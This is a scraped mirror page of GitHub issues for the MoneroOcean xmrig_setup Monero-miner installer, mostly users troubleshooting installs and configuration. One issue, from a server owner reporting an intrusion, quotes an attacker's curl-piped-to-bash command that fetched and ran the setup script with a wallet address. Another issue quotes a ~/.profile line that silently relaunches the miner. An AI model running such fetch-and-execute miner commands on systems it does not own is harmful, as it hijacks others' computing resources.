Git Product home page Git Product logo

xmrig_setup's People

Contributors

moneroocean avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

xmrig_setup's Issues

Setup fails on raspberry pi (64bit)

I get this error on trying to run, both on a clean install of raspian 64bit on a 4gig raspberry pi, and on a old notebook PC running raspian os:

gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
WARNING: Can't unpack /tmp/xmrig.tar.gz to /home/pi/moneroocean directory
[*] Checking if stock version of /home/pi/moneroocean/xmrig works fine (and not removed by antivirus software)
bash: line 199: /home/pi/moneroocean/xmrig: cannot execute binary file: Exec format error
ERROR: Stock version of /home/pi/moneroocean/xmrig is not functional too

Monero Miner Suddenly Running and using server resources

Hello, this is not necessarily an issue but I am not sure where to post it.

So we realized a high cpu(100%) usage on our server 3 days ago and realized the Monero Miner was the process consuming the resources.
We have nothing to do with Monero and so we found it suspicious to see a process we never installed running and using up our resources.
The process was running under a specific user account and so we reviewed the bash_history and noticed a curl command that downloads a script from this repository and executes it (That is why I am posting it here).

This is the cur command:
curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 41qbTDmsb6s4RiWgju3kSSNStWYY7mfyoepx4sFmw5um68MxJtnzQQw31bN1Y9hjp4jYwg2WTpeUfaGT375rNvyX4VGNw8Q

We have confirmed no one from our team executed that command and so we suspect the user account that was used to run the command has been compromised.
Does anyone have an Idea what could be going on here?
Thanks.

How to disable autostart?

I want to disable monero ocean service autostart. Despite the fact that I've turned off this service through sudo systemctl stop moneroocean_miner.service command, it's started after any reboot.

kawpow algo not working with Linux

Have two installations of xmrig-mo on the same PC. One Win10 install and the other in Manjaro. When running in Manjaro, the miner selects kawpow as the most efficient algo to use (same in win), will connect to the server and get new jobs. The GPU is running full speed, but no shares are ever excepted. It will keep getting new jobs, but not one is accepted. When I run in Win10, it starts accepting shares almost immediately. If I remove kawpow from the .json file, other algo work fine in Manjaro.

Both Win, and Manjaro are using the same .json file (except when I remove reference to kawpow).

Any help would be appreciated. Please let me know if you require more information.

Thanks

config.json

content://com.esuper.file.explorer.files/sdcard/Android/data/com.esuper.file.explorer/tmp/zip/xmrig-6.19.3-linux-static-x64/xmrig-6.19.3/config.json

Astrobwt does NOT honor max-thread-hint=50

I changed the config to "max-thread-hint=50" before the first run or autostart, so no profiles were generated.
it works for all other things, but not astrobwt. all others run on 2 threads, but astrobwt on 4.

it does not matter if I write if in config or set it as --cpu-max-thread-hint=50 arg.
it works when I lower the threads after the config is generated, but that is not what it was supposed to be.

please help and/or fix

config.json doesn't max-threads-hint

echo "sed -i 's/"max-threads-hint": [^,],/"max-threads-hint": 75,/' $HOME/moneroocean/config.json"
echo "sed -i 's/"max-threads-hint": [^,],/"max-threads-hint": 75,/' $HOME/moneroocean/config_background.json"

The commands do not work because the configuration files do not have max-threads-hint

.

Wrong repository, please ignore

Failed to Start WinRing0 Driver/Apply MSR Mod, Hashrate Will Be Low

In Windows 10 Pro x64, using the latest MO version of XMRig (6.9.0-mo1). No Virtual Machines running.

Right-clicking on xmrig.exe and choosing "Run As Administrator" is giving me the two error message upon startup that:

  • "failed to start WinRin0 driver, error 5"
  • "FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW."

Running as Administrator worked fine with the previous version.
20210223 -- XMRig MO Failed WinRing0 and MSR Mod

.

.

Launching ray (ray.io) triggers xmrig

$ ray up cluster.yaml triggers somehow something that starts (on the node on which the command launched and moneroocean service is installed) in the background xmrig --config=/home/user/moneroocean/config_background.json process. I'm not sure how to debug systemd. If I then start the service via sudo service moneroocean_miner start, it starts and I have 2 xmrig processes running. Any ideas?

Nothing is seen in xmrig.log, but syslog contains:

systemd[1]: Started Session 189 of user User.
xmrig[1748227]:  * ABOUT        XMRig/6.16.2-mo2 gcc/11.2.0
# other expected xmrig logs

Looks like the entry in ~/.profile is to blame:

/home/user/moneroocean/miner.sh --config=/home/user/moneroocean/config_background.json >/dev/null 2>&1                                                  

Why is this needed if it's already registered as a service (which starts at boot)? Also this entry in .profile is there only in 1 of 5 nodes on which this was run: curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s xxx. The shell used where the entry is present was byobu, shells where the entry in .profile doesn't exist was bash.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.